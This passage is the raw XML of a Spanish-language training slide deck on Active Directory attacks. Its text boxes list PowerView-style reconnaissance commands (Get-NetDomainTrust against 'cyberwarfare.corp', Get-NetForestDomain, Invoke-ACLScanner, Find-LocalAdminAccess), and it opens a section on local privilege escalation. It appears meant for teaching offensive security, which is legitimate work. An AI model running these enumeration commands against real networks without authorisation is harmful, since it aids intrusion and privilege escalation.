                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>Invoke-ACLScanner –ResolveGUIDs</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB0CA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1204"/>
        </w:tabs>
        <w:spacing w:before="328"/>
        <w:ind w:left="1204" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enumerar confianzas de dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B12235" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7A264A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="188"/>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88704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0884068C" wp14:editId="4BFBEA6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2816351</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>294844</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7490459" cy="1148080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0459" cy="1148080"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0BB2A2D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="208"/>
                              <w:ind w:right="569"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetDomainTrust</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="5F1E06D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="3" w:right="569"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>Get-NetDomainTrust –Dominio cyberwarfare.corp</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0884068C" id="Textbox 495" o:spid="_x0000_s1257" type="#_x0000_t202" style="position:absolute;margin-left:221.75pt;margin-top:23.2pt;width:589.8pt;height:90.4pt;z-index:-15627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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0BB2A2D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="208"/>
                        <w:ind w:right="569"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetDomainTrust</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="5F1E06D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="3" w:right="569"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>Get-NetDomainTrust –Dominio cyberwarfare.corp</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1BD952" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="620" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366D031E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1241"/>
        </w:tabs>
        <w:spacing w:before="65"/>
        <w:ind w:left="1241" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumerar todos los dominios de un bosque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D780F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789388F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="211"/>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89216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A5D089A" wp14:editId="7E1FCDD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4015740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>309957</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4787265" cy="1125220"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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265" cy="1125220"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="03D0F6A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="183"/>
                              <w:ind w:right="231"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>NetForestDomain</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> –Verbose</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02926020" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="4" w:right="231"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-NetForest -Verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1A5D089A" id="Textbox 496" o:spid="_x0000_s1258" type="#_x0000_t202" style="position:absolute;margin-left:316.2pt;margin-top:24.4pt;width:376.95pt;height:88.6pt;z-index:-15627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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="03D0F6A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="183"/>
                        <w:ind w:right="231"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>NetForestDomain</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> –Verbose</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02926020" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="4" w:right="231"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-NetForest -Verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFABB22" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E9D8CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="482"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2EF4F5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1241"/>
        </w:tabs>
        <w:ind w:left="1241" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Encuentre sesiones de equipo en las que el usuario actual tenga acceso de administrador local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D783597" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17ACD2DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C21A55F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D225DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4602C4BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73421E09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="93"/>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89728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25289F67" wp14:editId="2277F448">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4015740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>234404</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4960620" cy="769620"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0620" cy="769620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3D38EF75" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="263"/>
                              <w:ind w:left="276"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Find-LocalAdminAccess -Verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="25289F67" id="Textbox 497" o:spid="_x0000_s1259" type="#_x0000_t202" style="position:absolute;margin-left:316.2pt;margin-top:18.45pt;width:390.6pt;height:60.6pt;z-index:-15626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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3D38EF75" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="263"/>
                        <w:ind w:left="276"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Find-LocalAdminAccess -Verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8732E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="580" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB7EC6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="645" w:lineRule="exact"/>
        <w:ind w:left="1047" w:firstLine="0"/>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831040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EE33B08" wp14:editId="1E5C89AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>120337</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>837566</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12071985" cy="4092575"/>
                <wp:effectExtent l="0" t="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71985" cy="4092575"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12071985" cy="4092575"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="499" name="Image 499"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId235" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12071662" cy="4092240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="500" name="Image 500"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId236" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164650" y="164716"/>
                            <a:ext cx="11762232" cy="3776472"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1ABBCE7D" id="Group 498" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.5pt;margin-top:65.95pt;width:950.55pt;height:322.25pt;z-index:15831040;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="120719,40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">
                <v:shape id="Image 499" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:120716;height:4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">
                  <v:imagedata r:id="rId237" o:title=""/>
                </v:shape>
                <v:shape id="Image 500" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1647;width:117622;height:3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">
                  <v:imagedata r:id="rId238" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escalada de privilegios locales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF61A1F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="645" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3554C8CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1716"/>
        </w:tabs>
        <w:spacing w:before="412"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Un adversario intenta escalar los privilegios de menor a mayor (administrador, raíz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7C9B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF1831D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1716"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hay varias vulnerabilidades de las que se puede abusar en el entorno Windows/Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FB405" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
